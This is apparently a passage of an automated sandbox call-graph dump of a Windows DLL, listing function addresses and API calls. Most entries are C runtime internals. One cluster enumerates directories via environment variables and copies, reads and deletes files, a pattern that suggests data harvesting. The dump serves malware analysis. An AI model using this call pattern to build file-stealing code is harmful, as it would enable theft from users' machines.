6836->6838 6837->6825 6839 10008e4a 6838->6839 6863 10009a22 6839->6863 6842 10007a66 6841->6842 6843 10007a7b 6841->6843 6844 10006368 __dosmaperr 20 API calls 6842->6844 6843->6828 6845 10007a6b 6844->6845 6846 100062ac ___std_exception_copy 26 API calls 6845->6846 6847 10007a76 6846->6847 6847->6828 6849 1000adf2 6848->6849 6850 1000addd 6848->6850 6851 1000ae2d 6849->6851 6856 1000ae19 6849->6856 6852 10006355 __dosmaperr 20 API calls 6850->6852 6853 10006355 __dosmaperr 20 API calls 6851->6853 6854 1000ade2 6852->6854 6857 1000ae32 6853->6857 6855 10006368 __dosmaperr 20 API calls 6854->6855 6860 1000a070 6855->6860 7036 1000ada6 6856->7036 6859 10006368 __dosmaperr 20 API calls 6857->6859 6861 1000ae3a 6859->6861 6860->6824 6860->6831 6862 100062ac ___std_exception_copy 26 API calls 6861->6862 6862->6860 6864 10009a2e ___DestructExceptionObject 6863->6864 6865 10009a36 6864->6865 6866 10009a4e 6864->6866 6888 10006355 6865->6888 6868 10009aec 6866->6868 6872 10009a83 6866->6872 6870 10006355 __dosmaperr 20 API calls 6868->6870 6873 10009af1 6870->6873 6871 10006368 __dosmaperr 20 API calls 6874 10009a43 _abort 6871->6874 6891 10008c7b RtlEnterCriticalSection 6872->6891 6876 10006368 __dosmaperr 20 API calls 6873->6876 6874->6837 6878 10009af9 6876->6878 6877 10009a89 6879 10009aa5 6877->6879 6880 10009aba 6877->6880 6881 100062ac ___std_exception_copy 26 API calls 6878->6881 6882 10006368 __dosmaperr 20 API calls 6879->6882 6892 10009b0d 6880->6892 6881->6874 6884 10009aaa 6882->6884 6886 10006355 __dosmaperr 20 API calls 6884->6886 6885 10009ab5 6943 10009ae4 6885->6943 6886->6885 6889 10005b7a __dosmaperr 20 API calls 6888->6889 6890 1000635a 6889->6890 6890->6871 6891->6877 6893 10009b34 6892->6893 6894 10009b3b 6892->6894 6898 10002ada _ValidateLocalCookies 5 API calls 6893->6898 6895 10009b5e 6894->6895 6896 10009b3f 6894->6896 6900 10009baf 6895->6900 6901 10009b92 6895->6901 6897 10006355 __dosmaperr 20 API calls 6896->6897 6899 10009b44 6897->6899 6902 10009d15 6898->6902 6903 10006368 __dosmaperr 20 API calls 6899->6903 6904 10009bc5 6900->6904 6946 1000a00b 6900->6946 6905 10006355 __dosmaperr 20 API calls 6901->6905 6902->6885 6906 10009b4b 6903->6906 6949 100096b2 6904->6949 6909 10009b97 6905->6909 6910 100062ac ___std_exception_copy 26 API calls 6906->6910 6912 10006368 __dosmaperr 20 API calls 6909->6912 6910->6893 6913 10009b9f 6912->6913 6916 100062ac ___std_exception_copy 26 API calls 6913->6916 6914 10009bd3 6919 10009bd7 6914->6919 6920 10009bf9 6914->6920 6915 10009c0c 6917 10009c20 6915->6917 6918 10009c66 WriteFile 6915->6918 6916->6893 6923 10009c56 6917->6923 6924 10009c28 6917->6924 6921 10009c89 GetLastError 6918->6921 6926 10009bef 6918->6926 6925 10009ccd 6919->6925 6956 10009645 6919->6956 6961 10009492 GetConsoleCP 6920->6961 6921->6926 6987 10009728 6923->6987 6927 10009c46 6924->6927 6928 10009c2d 6924->6928 6925->6893 6931 10006368 __dosmaperr 20 API calls 6925->6931 6926->6893 6926->6925 6934 10009ca9 6926->6934 6979 100098f5 6927->6979 6928->6925 6972 10009807 6928->6972 6933 10009cf2 6931->6933 6936 10006355 __dosmaperr 20 API calls 6933->6936 6937 10009cb0 6934->6937 6938 10009cc4 6934->6938 6936->6893 6939 10006368 __dosmaperr 20 API calls 6937->6939 6994 10006332 6938->6994 6941 10009cb5 6939->6941 6942 10006355 __dosmaperr 20 API calls 6941->6942 6942->6893 7035 10008c9e RtlLeaveCriticalSection 6943->7035 6945 10009aea 6945->6874 6999 10009f8d 6946->6999 7021 10008dbc 6949->7021 6951 100096c2 6952 100096c7 6951->6952 6953 10005af6 _abort 38 API calls 6951->6953 6952->6914 6952->6915 6954 100096ea 6953->6954 6954->6952 6955 10009708 GetConsoleMode 6954->6955 6955->6952 6959 1000966a 6956->6959 6960 1000969f 6956->6960 6957 1000a181 WriteConsoleW CreateFileW 6957->6959 6958 100096a1 GetLastError 6958->6960 6959->6957 6959->6958 6959->6960 6960->6926 6965 100094f5 6961->6965 6971 10009607 6961->6971 6962 10002ada _ValidateLocalCookies 5 API calls 6963 10009641 6962->6963 6963->6926 6966 1000957b WideCharToMultiByte 6965->6966 6968 100079e6 40 API calls __fassign 6965->6968 6970 100095d2 WriteFile 6965->6970 6965->6971 7030 10007c19 6965->7030 6967 100095a1 WriteFile 6966->6967 6966->6971 6967->6965 6969 1000962a GetLastError 6967->6969 6968->6965 6969->6971 6970->6965 6970->6969 6971->6962 6974 10009816 6972->6974 6973 100098d8 6976 10002ada _ValidateLocalCookies 5 API calls 6973->6976 6974->6973 6975 10009894 WriteFile 6974->6975 6975->6974 6977 100098da GetLastError 6975->6977 6978 100098f1 6976->6978 6977->6973 6978->6926 6986 10009904 6979->6986 6980 10009a0f 6981 10002ada _ValidateLocalCookies 5 API calls 6980->6981 6983 10009a1e 6981->6983 6982 10009986 WideCharToMultiByte 6984 10009a07 GetLastError 6982->6984 6985 100099bb WriteFile 6982->6985 6983->6926 6984->6980 6985->6984 6985->6986 6986->6980 6986->6982 6986->6985 6988 10009737 6987->6988 6989 100097ea 6988->6989 6990 100097a9 WriteFile 6988->6990 6991 10002ada _ValidateLocalCookies 5 API calls 6989->6991 6990->6988 6992 100097ec GetLastError 6990->6992 6993 10009803 6991->6993 6992->6989 6993->6926 6995 10006355 __dosmaperr 20 API calls 6994->6995 6996 1000633d __dosmaperr 6995->6996 6997 10006368 __dosmaperr 20 API calls 6996->6997 6998 10006350 6997->6998 6998->6893 7008 10008d52 6999->7008 7001 10009f9f 7002 10009fa7 7001->7002 7003 10009fb8 SetFilePointerEx 7001->7003 7004 10006368 __dosmaperr 20 API calls 7002->7004 7005 10009fd0 GetLastError 7003->7005 7007 10009fac 7003->7007 7004->7007 7006 10006332 __dosmaperr 20 API calls 7005->7006 7006->7007 7007->6904 7009 10008d74 7008->7009 7010 10008d5f 7008->7010 7013 10006355 __dosmaperr 20 API calls 7009->7013 7015 10008d99 7009->7015 7011 10006355 __dosmaperr 20 API calls 7010->7011 7012 10008d64 7011->7012 7014 10006368 __dosmaperr 20 API calls 7012->7014 7016 10008da4 7013->7016 7017 10008d6c 7014->7017 7015->7001 7018 10006368 __dosmaperr 20 API calls 7016->7018 7017->7001 7019 10008dac 7018->7019 7020 100062ac ___std_exception_copy 26 API calls 7019->7020 7020->7017 7022 10008dd6 7021->7022 7023 10008dc9 7021->7023 7025 10008de2 7022->7025 7026 10006368 __dosmaperr 20 API calls 7022->7026 7024 10006368 __dosmaperr 20 API calls 7023->7024 7027 10008dce 7024->7027 7025->6951 7028 10008e03 7026->7028 7027->6951 7029 100062ac ___std_exception_copy 26 API calls 7028->7029 7029->7027 7031 10005af6 _abort 38 API calls 7030->7031 7032 10007c24 7031->7032 7033 10007a00 __fassign 38 API calls 7032->7033 7034 10007c34 7033->7034 7034->6965 7035->6945 7039 1000ad24 7036->7039 7038 1000adca 7038->6860 7040 1000ad30 ___DestructExceptionObject 7039->7040 7050 10008c7b RtlEnterCriticalSection 7040->7050 7042 1000ad3e 7043 1000ad70 7042->7043 7044 1000ad65 7042->7044 7046 10006368 __dosmaperr 20 API calls 7043->7046 7051 1000ae4d 7044->7051 7047 1000ad6b 7046->7047 7066 1000ad9a 7047->7066 7049 1000ad8d _abort 7049->7038 7050->7042 7052 10008d52 26 API calls 7051->7052 7054 1000ae5d 7052->7054 7053 1000ae63 7069 10008cc1 7053->7069 7054->7053 7056 1000ae95 7054->7056 7059 10008d52 26 API calls 7054->7059 7056->7053 7057 10008d52 26 API calls 7056->7057 7060 1000aea1 CloseHandle 7057->7060 7062 1000ae8c 7059->7062 7060->7053 7064 1000aead GetLastError 7060->7064 7061 1000aedd 7061->7047 7063 10008d52 26 API calls 7062->7063 7063->7056 7064->7053 7065 10006332 __dosmaperr 20 API calls 7065->7061 7078 10008c9e RtlLeaveCriticalSection 7066->7078 7068 1000ada4 7068->7049 7070 10008cd0 7069->7070 7071 10008d37 7069->7071 7070->7071 7076 10008cfa 7070->7076 7072 10006368 __dosmaperr 20 API calls 7071->7072 7073 10008d3c 7072->7073 7074 10006355 __dosmaperr 20 API calls 7073->7074 7075 10008d27 7074->7075 7075->7061 7075->7065 7076->7075 7077 10008d21 SetStdHandle 7076->7077 7077->7075 7078->7068 7079->6834 7080->6814 7081 10002049 7082 10002055 ___DestructExceptionObject 7081->7082 7083 100020d3 7082->7083 7084 1000207d 7082->7084 7094 1000205e 7082->7094 7085 10002639 ___scrt_fastfail 4 API calls 7083->7085 7095 1000244c 7084->7095 7087 100020da 7085->7087 7088 10002082 7104 10002308 7088->7104 7090 10002087 __RTC_Initialize 7107 100020c4 7090->7107 7092 1000209f 7110 1000260b 7092->7110 7096 10002451 ___scrt_release_startup_lock 7095->7096 7097 10002461 7096->7097 7098 10002455 7096->7098 7101 1000246e 7097->7101 7102 1000499b _abort 28 API calls 7097->7102 7099 1000527a _abort 20 API calls 7098->7099 7100 1000245f 7099->7100 7100->7088 7101->7088 7103 10004bbd 7102->7103 7103->7088 7116 100034c7 RtlInterlockedFlushSList 7104->7116 7106 10002312 7106->7090 7118 1000246f 7107->7118 7109 100020c9 ___scrt_release_startup_lock 7109->7092 7111 10002617 7110->7111 7112 1000262d 7111->7112 7137 100053ed 7111->7137 7112->7094 7115 10003529 ___vcrt_uninitialize 8 API calls 7115->7112 7117 100034d7 7116->7117 7117->7106 7123 100053ff 7118->7123 7121 1000391b ___vcrt_uninitialize_ptd 6 API calls 7122 1000354d 7121->7122 7122->7109 7126 10005c2b 7123->7126 7127 10005c35 7126->7127 7129 10002476 7126->7129 7130 10005db2 7127->7130 7129->7121 7131 10005c45 _abort 5 API calls 7130->7131 7132 10005dd9 7131->7132 7133 10005df1 TlsFree 7132->7133 7134 10005de5 7132->7134 7133->7134 7135 10002ada _ValidateLocalCookies 5 API calls 7134->7135 7136 10005e02 7135->7136 7136->7129 7140 100074da 7137->7140 7143 100074f3 7140->7143 7141 10002ada _ValidateLocalCookies 5 API calls 7142 10002625 7141->7142 7142->7115 7143->7141 7277 10008a89 7280 10006d60 7277->7280 7281 10006d69 7280->7281 7282 10006d72 7280->7282 7284 10006c5f 7281->7284 7285 10005af6 _abort 38 API calls 7284->7285 7286 10006c6c 7285->7286 7287 10006d7e __fassign 38 API calls 7286->7287 7288 10006c74 7287->7288 7304 100069f3 7288->7304 7291 10006c8b 7291->7282 7294 10006cce 7297 1000571e _free 20 API calls 7294->7297 7297->7291 7298 10006cc9 7299 10006368 __dosmaperr 20 API calls 7298->7299 7299->7294 7300 10006d12 7300->7294 7328 100068c9 7300->7328 7301 10006ce6 7301->7300 7302 1000571e _free 20 API calls 7301->7302 7302->7300 7305 100054a7 __fassign 38 API calls 7304->7305 7306 10006a05 7305->7306 7307 10006a14 GetOEMCP 7306->7307 7308 10006a26 7306->7308 7310 10006a3d 7307->7310 7309 10006a2b GetACP 7308->7309 7308->7310 7309->7310 7310->7291 7311 100056d0 7310->7311 7312 1000570e 7311->7312 7313 100056de _abort 7311->7313 7314 10006368 __dosmaperr 20 API calls 7312->7314 7313->7312 7315 100056f9 RtlAllocateHeap 7313->7315 7317 1000474f _abort 7 API calls 7313->7317 7316 1000570c 7314->7316 7315->7313 7315->7316 7316->7294 7318 10006e20 7316->7318 7317->7313 7319 100069f3 40 API calls 7318->7319 7320 10006e3f 7319->7320 7323 10006e90 IsValidCodePage 7320->7323 7325 10006e46 7320->7325 7327 10006eb5 ___scrt_fastfail 7320->7327 7321 10002ada _ValidateLocalCookies 5 API calls 7322 10006cc1 7321->7322 7322->7298 7322->7301 7324 10006ea2 GetCPInfo 7323->7324 7323->7325 7324->7325 7324->7327 7325->7321 7331 10006acb GetCPInfo 7327->7331 7404 10006886 7328->7404 7330 100068ed 7330->7294 7332 10006baf 7331->7332 7338 10006b05 7331->7338 7335 10002ada _ValidateLocalCookies 5 API calls 7332->7335 7337 10006c5b 7335->7337 7337->7325 7341 100086e4 7338->7341 7340 10008a3e 43 API calls 7340->7332 7342 100054a7 __fassign 38 API calls 7341->7342 7343 10008704 MultiByteToWideChar 7342->7343 7345 10008742 7343->7345 7346 100087da 7343->7346 7348 100056d0 21 API calls 7345->7348 7352 10008763 ___scrt_fastfail 7345->7352 7347 10002ada _ValidateLocalCookies 5 API calls 7346->7347 7349 10006b66 7347->7349 7348->7352 7355 10008a3e 7349->7355 7350 100087d4 7360 10008801 7350->7360 7352->7350 7353 100087a8 MultiByteToWideChar 7352->7353 7353->7350 7354 100087c4 GetStringTypeW 7353->7354 7354->7350 7356 100054a7 __fassign 38 API calls 7355->7356 7357 10008a51 7356->7357 7364 10008821 7357->7364 7361 1000880d 7360->7361 7362 1000881e 7360->7362 7361->7362 7363 1000571e _free 20 API calls 7361->7363 7362->7346 7363->7362 7366 1000883c 7364->7366 7365 10008862 MultiByteToWideChar 7367 1000888c 7365->7367 7378 10008a16 7365->7378 7366->7365 7372 100056d0 21 API calls 7367->7372 7374 100088ad 7367->7374 7368 10002ada _ValidateLocalCookies 5 API calls 7369 10006b87 7368->7369 7369->7340 7370 100088f6 MultiByteToWideChar 7371 10008962 7370->7371 7373 1000890f 7370->7373 7376 10008801 __freea 20 API calls 7371->7376 7372->7374 7391 10005f19 7373->7391 7374->7370 7374->7371 7376->7378 7378->7368 7379 10008971 7381 100056d0 21 API calls 7379->7381 7384 10008992 7379->7384 7380 10008939 7380->7371 7382 10005f19 11 API calls 7380->7382 7381->7384 7382->7371 7383 10008a07 7386 10008801 __freea 20 API calls 7383->7386 7384->7383 7385 10005f19 11 API calls 7384->7385 7387 100089e6 7385->7387 7386->7371 7387->7383 7388 100089f5 WideCharToMultiByte 7387->7388 7388->7383 7389 10008a35 7388->7389 7390 10008801 __freea 20 API calls 7389->7390 7390->7371 7392 10005c45 _abort 5 API calls 7391->7392 7393 10005f40 7392->7393 7396 10005f49 7393->7396 7399 10005fa1 7393->7399 7397 10002ada _ValidateLocalCookies 5 API calls 7396->7397 7398 10005f9b 7397->7398 7398->7371 7398->7379 7398->7380 7400 10005c45 _abort 5 API calls 7399->7400 7401 10005fc8 7400->7401 7402 10002ada _ValidateLocalCookies 5 API calls 7401->7402 7403 10005f89 LCMapStringW 7402->7403 7403->7396 7405 10006892 ___DestructExceptionObject 7404->7405 7412 10005671 RtlEnterCriticalSection 7405->7412 7407 1000689c 7413 100068f1 7407->7413 7411 100068b5 _abort 7411->7330 7412->7407 7425 10007011 7413->7425 7415 1000693f 7416 10007011 26 API calls 7415->7416 7417 1000695b 7416->7417 7418 10007011 26 API calls 7417->7418 7419 10006979 7418->7419 7420 100068a9 7419->7420 7421 1000571e _free 20 API calls 7419->7421 7422 100068bd 7420->7422 7421->7420 7439 100056b9 RtlLeaveCriticalSection 7422->7439 7424 100068c7 7424->7411 7426 10007022 7425->7426 7435 1000701e 7425->7435 7427 10007029 7426->7427 7431 1000703c ___scrt_fastfail 7426->7431 7428 10006368 __dosmaperr 20 API calls 7427->7428 7429 1000702e 7428->7429 7430 100062ac ___std_exception_copy 26 API calls 7429->7430 7430->7435 7432 10007073 7431->7432 7433 1000706a 7431->7433 7431->7435 7432->7435 7437 10006368 __dosmaperr 20 API calls 7432->7437 7434 10006368 __dosmaperr 20 API calls 7433->7434 7436 1000706f 7434->7436 7435->7415 7438 100062ac ___std_exception_copy 26 API calls 7436->7438 7437->7436 7438->7435 7439->7424 6113 1000220c 6114 10002215 6113->6114 6115 1000221a dllmain_dispatch 6113->6115 6117 100022b1 6114->6117 6118 100022c7 6117->6118 6120 100022d0 6118->6120 6121 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6118->6121 6120->6115 6121->6120 7144 1000724e GetProcessHeap 7145 1000284f 7146 10002882 std::exception::exception 27 API calls 7145->7146 7147 1000285d 7146->7147 7444 10003c90 RtlUnwind 7542 100036d0 7543 100036e2 7542->7543 7545 100036f0 @_EH4_CallFilterFunc@8 7542->7545 7544 10002ada _ValidateLocalCookies 5 API calls 7543->7544 7544->7545 7148 10005351 7149 10005360 7148->7149 7153 10005374 7148->7153 7151 1000571e _free 20 API calls 7149->7151 7149->7153 7150 1000571e _free 20 API calls 7152 10005386 7150->7152 7151->7153 7154 1000571e _free 20 API calls 7152->7154 7153->7150 7155 10005399 7154->7155 7156 1000571e _free 20 API calls 7155->7156 7157 100053aa 7156->7157 7158 1000571e _free 20 API calls 7157->7158 7159 100053bb 7158->7159 7546 100073d5 7547 100073e1 ___DestructExceptionObject 7546->7547 7558 10005671 RtlEnterCriticalSection 7547->7558 7549 100073e8 7550 10008be3 27 API calls 7549->7550 7552 100073f7 7550->7552 7551 10007406 7570 10007422 7551->7570 7552->7551 7559 10007269 GetStartupInfoW 7552->7559 7555 10007417 _abort 7558->7549 7560 10007286 7559->7560 7561 10007318 7559->7561 7560->7561 7562 10008be3 27 API calls 7560->7562 7565 1000731f 7561->7565 7563 100072af 7562->7563 7563->7561 7564 100072dd GetFileType 7563->7564 7564->7563 7566 10007326 7565->7566 7567 10007369 GetStdHandle 7566->7567 7568 100073d1 7566->7568 7569 1000737c GetFileType 7566->7569 7567->7566 7568->7551 7569->7566 7573 100056b9 RtlLeaveCriticalSection 7570->7573 7572 10007429 7572->7555 7573->7572 7574 10004ed7 7575 10006d60 51 API calls 7574->7575 7576 10004ee9 7575->7576 7585 10007153 GetEnvironmentStringsW 7576->7585 7579 10004ef4 7581 1000571e _free 20 API calls 7579->7581 7582 10004f29 7581->7582 7583 10004eff 7584 1000571e _free 20 API calls 7583->7584 7584->7579 7586 1000716a 7585->7586 7596 100071bd 7585->7596 7587 10007170 WideCharToMultiByte 7586->7587 7590 1000718c 7587->7590 7587->7596 7588 100071c6 FreeEnvironmentStringsW 7589 10004eee 7588->7589 7589->7579 7597 10004f2f 7589->7597 7591 100056d0 21 API calls 7590->7591 7592 10007192 7591->7592 7593 100071af 7592->7593 7594 10007199 WideCharToMultiByte 7592->7594 7595 1000571e _free 20 API calls 7593->7595 7594->7593 7595->7596 7596->7588 7596->7589 7598 10004f44 7597->7598 7599 1000637b _abort 20 API calls 7598->7599 7600 10004f6b 7599->7600 7601 10004fcf 7600->7601 7604 1000637b _abort 20 API calls 7600->7604 7605 10004fd1 7600->7605 7607 1000544d ___std_exception_copy 26 API calls 7600->7607 7610 10004ff3 7600->7610 7612 1000571e _free 20 API calls 7600->7612 7602 1000571e _free 20 API calls 7601->7602 7603 10004fe9 7602->7603 7603->7583 7604->7600 7606 10005000 20 API calls 7605->7606 7608 10004fd7 7606->7608 7607->7600 7609 1000571e _free 20 API calls 7608->7609 7609->7601 7611 100062bc ___std_exception_copy 11 API calls 7610->7611 7613 10004fff 7611->7613 7612->7600 6122 10002418 6123 10002420 ___scrt_release_startup_lock 6122->6123 6126 100047f5 6123->6126 6125 10002448 6127 10004804 6126->6127 6128 10004808 6126->6128 6127->6125 6131 10004815 6128->6131 6132 10005b7a __dosmaperr 20 API calls 6131->6132 6135 1000482c 6132->6135 6133 10002ada _ValidateLocalCookies 5 API calls 6134 10004811 6133->6134 6134->6125 6135->6133 7445 10004a9a 7448 10005411 7445->7448 7449 1000541d _abort 7448->7449 7450 10005af6 _abort 38 API calls 7449->7450 7453 10005422 7450->7453 7451 100055a8 _abort 38 API calls 7452 1000544c 7451->7452 7453->7451 5864 10001c5b 5865 10001c6b ___scrt_fastfail 5864->5865 5868 100012ee 5865->5868 5867 10001c87 5869 10001324 ___scrt_fastfail 5868->5869 5870 100013b7 GetEnvironmentVariableW 5869->5870 5894 100010f1 5870->5894 5873 100010f1 57 API calls 5874 10001465 5873->5874 5875 100010f1 57 API calls 5874->5875 5876 10001479 5875->5876 5877 100010f1 57 API calls 5876->5877 5878 1000148d 5877->5878 5879 100010f1 57 API calls 5878->5879 5880 100014a1 5879->5880 5881 100010f1 57 API calls 5880->5881 5882 100014b5 lstrlenW 5881->5882 5883 100014d2 5882->5883 5884 100014d9 lstrlenW 5882->5884 5883->5867 5885 100010f1 57 API calls 5884->5885 5886 10001501 lstrlenW lstrcatW 5885->5886 5887 100010f1 57 API calls 5886->5887 5888 10001539 lstrlenW lstrcatW 5887->5888 5889 100010f1 57 API calls 5888->5889 5890 1000156b lstrlenW lstrcatW 5889->5890 5891 100010f1 57 API calls 5890->5891 5892 1000159d lstrlenW lstrcatW 5891->5892 5893 100010f1 57 API calls 5892->5893 5893->5883 5895 10001118 ___scrt_fastfail 5894->5895 5896 10001129 lstrlenW 5895->5896 5907 10002c40 5896->5907 5898 10001148 lstrcatW lstrlenW 5899 10001177 lstrlenW FindFirstFileW 5898->5899 5900 10001168 lstrlenW 5898->5900 5901 100011a0 5899->5901 5902 100011e1 5899->5902 5900->5899 5903 100011c7 FindNextFileW 5901->5903 5906 100011aa 5901->5906 5902->5873 5903->5901 5904 100011da FindClose 5903->5904 5904->5902 5906->5903 5909 10001000 5906->5909 5908 10002c57 5907->5908 5908->5898 5908->5908 5910 10001022 ___scrt_fastfail 5909->5910 5911 100010af 5910->5911 5912 1000102f lstrcatW lstrlenW 5910->5912 5913 100010b5 lstrlenW 5911->5913 5914 100010ad 5911->5914 5915 1000105a lstrlenW 5912->5915 5916 1000106b lstrlenW 5912->5916 5940 10001e16 5913->5940 5914->5906 5915->5916 5926 10001e89 lstrlenW 5916->5926 5919 10001088 GetFileAttributesW 5919->5914 5921 1000109c 5919->5921 5920 100010ca 5920->5914 5922 10001e89 5 API calls 5920->5922 5921->5914 5932 1000173a 5921->5932 5924 100010df 5922->5924 5945 100011ea 5924->5945 5927 10002c40 ___scrt_fastfail 5926->5927 5928 10001ea7 lstrcatW lstrlenW 5927->5928 5929 10001ed1 lstrcatW 5928->5929 5930 10001ec2 5928->5930 5929->5919 5930->5929 5931 10001ec7 lstrlenW 5930->5931 5931->5929 5933 10001747 ___scrt_fastfail 5932->5933 5960 10001cca 5933->5960 5935 1000199f 5935->5914 5938 10001824 ___scrt_fastfail _strlen 5938->5935 5980 100015da 5938->5980 5941 10001e29 5940->5941 5944 10001e4c 5940->5944 5942 10001e2d lstrlenW 5941->5942 5941->5944 5943 10001e3f lstrlenW 5942->5943 5942->5944 5943->5944 5944->5920 5946 1000120e ___scrt_fastfail 5945->5946 5947 10001e89 5 API calls 5946->5947 5948 10001220 GetFileAttributesW 5947->5948 5949 10001235 5948->5949 5950 10001246 5948->5950 5949->5950 5952 1000173a 35 API calls 5949->5952 5951 10001e89 5 API calls 5950->5951 5953 10001258 5951->5953 5952->5950 5954 100010f1 56 API calls 5953->5954 5955 1000126d 5954->5955 5956 10001e89 5 API calls 5955->5956 5957 1000127f ___scrt_fastfail 5956->5957 5958 100010f1 56 API calls 5957->5958 5959 100012e6 5958->5959 5959->5914 5961 10001cf1 ___scrt_fastfail 5960->5961 5962 10001d0f CopyFileW CreateFileW 5961->5962 5963 10001d44 DeleteFileW 5962->5963 5964 10001d55 GetFileSize 5962->5964 5969 10001808 5963->5969 5965 10001ede 22 API calls 5964->5965 5966 10001d66 ReadFile 5965->5966 5967 10001d94 CloseHandle DeleteFileW 5966->5967 5968 10001d7d CloseHandle DeleteFileW 5966->5968 5967->5969 5968->5969 5969->5935 5970 10001ede 5969->5970 5972 1000222f 5970->5972 5973 1000224e 5972->5973 5976 10002250 5972->5976 5988 1000474f 5972->5988 5993 100047e5 5972->5993 5973->5938 5975 10002908 5977 100035d2 __CxxThrowException@8 RaiseException 5975->5977 5976->5975 6000 100035d2 5976->6000 5979 10002925 5977->5979 5979->5938 5981 1000160c _strcat _strlen 5980->5981 5982 1000163c lstrlenW 5981->5982 6088 10001c9d 5982->6088 5984 10001655 lstrcatW lstrlenW 5985 10001678 5984->5985 5986 10001693 ___scrt_fastfail 5985->5986 5987 1000167e lstrcatW 5985->5987 5986->5938 5987->5986 6003 10004793 5988->6003 5990 10004765 6009 10002ada 5990->6009 5992 1000478f 5992->5972 5995 100056d0 _abort 5993->5995 5994 1000570e 6022 10006368 5994->6022 5995->5994 5997 100056f9 RtlAllocateHeap 5995->5997 5999 1000474f _abort 7 API calls 5995->5999 5997->5995 5998 1000570c 5997->5998 5998->5972 5999->5995 6002 100035f2 RaiseException 6000->6002 6002->5975 6004 1000479f ___DestructExceptionObject 6003->6004 6016 10005671 RtlEnterCriticalSection 6004->6016 6006 100047aa 6017 100047dc 6006->6017 6008 100047d1 _abort 6008->5990 6010 10002ae3 6009->6010 6011 10002ae5 IsProcessorFeaturePresent 6009->6011 6010->5992 6013 10002b58 6011->6013 6021 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6013->6021 6015 10002c3b 6015->5992 6016->6006 6020 100056b9 RtlLeaveCriticalSection 6017->6020 6019 100047e3 6019->6008 6020->6019 6021->6015 6025 10005b7a GetLastError 6022->6025 6026 10005b93 6025->6026 6027 10005b99 6025->6027 6044 10005e08 6026->6044 6031 10005bf0 SetLastError 6027->6031 6051 1000637b 6027->6051 6033 10005bf9 6031->6033 6032 10005bb3 6058 1000571e 6032->6058 6033->5998 6037 10005bb9 6040 10005be7 SetLastError 6037->6040 6038 10005bcf 6071 1000593c 6038->6071 6040->6033 6042 1000571e _free 17 API calls 6043 10005be0 6042->6043 6043->6031 6043->6040 6076 10005c45 6044->6076 6046 10005e2f 6047 10005e47 TlsGetValue 6046->6047 6048 10005e3b 6046->6048 6047->6048 6049 10002ada _ValidateLocalCookies 5 API calls 6048->6049 6050 10005e58 6049->6050 6050->6027 6056 10006388 _abort 6051->6056 6052 100063c8 6055 10006368 __dosmaperr 19 API calls 6052->6055 6053 100063b3 RtlAllocateHeap 6054 10005bab 6053->6054 6053->6056 6054->6032 6064 10005e5e 6054->6064 6055->6054 6056->6052 6056->6053 6057 1000474f _abort 7 API calls 6056->6057 6057->6056 6059 10005729 HeapFree 6058->6059 6063 10005752 __dosmaperr 6058->6063 6060 1000573e 6059->6060 6059->6063 6061 10006368 __dosmaperr 18 API calls 6060->6061 6062 10005744 GetLastError 6061->6062 6062->6063 6063->6037 6065 10005c45 _abort 5 API calls 6064->6065 6066 10005e85 6065->6066 6067 10005ea0 TlsSetValue 6066->6067 6068 10005e94 6066->6068 6067->6068 6069 10002ada _ValidateLocalCookies 5 API calls 6068->6069 6070 10005bc8 6069->6070 6070->6032 6070->6038 6082 10005914 6071->6082 6077 10005c71 6076->6077 6078 10005c75 __crt_fast_encode_pointer 6076->6078 6077->6078 6079 10005ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6077->6079 6081 10005c95 6077->6081 6078->6046 6079->6077 6080 10005ca1 GetProcAddress 6080->6078 6081->6078 6081->6080 6083 10005854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6082->6083 6084 10005938 6083->6084 6085 100058c4 6084->6085 6086 10005758 _abort 20 API calls 6085->6086 6087 100058e8 6086->6087 6087->6042 6089 10001ca6 _strlen 6088->6089 6089->5984 7614 100020db 7617 100020e7 ___DestructExceptionObject 7614->7617 7615 100020f6 7616 10002110 dllmain_raw 7616->7615 7618 1000212a 7616->7618 7617->7615 7617->7616 7622 1000210b 7617->7622 7627 10001eec 7618->7627 7620 10002177 7620->7615 7621 10001eec 31 API calls 7620->7621 7623 1000218a 7621->7623 7622->7615 7622->7620 7625 10001eec 31 API calls 7622->7625 7623->7615 7624 10002193 dllmain_raw 7623->7624 7624->7615 7626 1000216d dllmain_raw 7625->7626 7626->7620 7628 10001ef7 7627->7628 7629 10001f2a dllmain_crt_process_detach 7627->7629 7630 10001f1c dllmain_crt_process_attach 7628->7630 7631 10001efc 7628->7631 7636 10001f06 7629->7636 7630->7636 7632 10001f12 7631->7632 7633 10001f01 7631->7633 7642 100023ec 7632->7642 7633->7636 7637 1000240b 7633->7637 7636->7622 7650 100053e5 7637->7650 7743 10003513 7642->7743 7647 10002408 7647->7636 7648 1000351e 7 API calls 7649 100023f5 7648->7649 7649->7636 7656 10005aca 7650->7656 7653 1000351e 7732 10003820 7653->7732 7655 10002415 7655->7636 7657 10005ad4 7656->7657 7658 10002410 7656->7658 7659 10005e08 _abort 11 API calls 7657->7659 7658->7653 7660 10005adb 7659->7660 7660->7658 7661 10005e5e _abort 11 API calls 7660->7661 7662 10005aee 7661->7662 7664 100059b5 7662->7664 7665 100059c0 7664->7665 7669 100059d0 7664->7669 7670 100059d6 7665->7670 7668 1000571e _free 20 API calls 7668->7669 7669->7658 7671 100059e9 7670->7671 7674 100059ef 7670->7674 7672 1000571e _free 20 API calls 7671->7672 7672->7674 7673 1000571e _free 20 API calls 7675 100059fb 7673->7675 7674->7673 7676 1000571e _free 20 API calls 7675->7676 7677 10005a06 7676->7677 7678 1000571e _free 20 API calls 7677->7678 7679 10005a11 7678->7679 7680 1000571e _free 20 API calls 7679->7680 7681 10005a1c 7680->7681 7682 1000571e _free 20 API calls 7681->7682 7683 10005a27 7682->7683 7684 1000571e _free 20 API calls 7683->7684 7685 10005a32 7684->7685 7686 1000571e _free 20 API calls 7685->7686 7687 10005a3d 7686->7687 7688 1000571e _free 20 API calls 7687->7688 7689 10005a48 7688->7689 7690 1000571e _free 20 API calls 7689->7690 7691 10005a56 7690->7691 7696 1000589c 7691->7696 7702 100057a8 7696->7702 7698 100058c0 7699 100058ec 7698->7699 7715 10005809 7699->7715 7701 10005910 7701->7668 7703 100057b4 ___DestructExceptionObject 7702->7703 7710 10005671 RtlEnterCriticalSection 7703->7710 7705 100057be 7708 1000571e _free 20 API calls 7705->7708 7709 100057e8 7705->7709 7707 100057f5 _abort 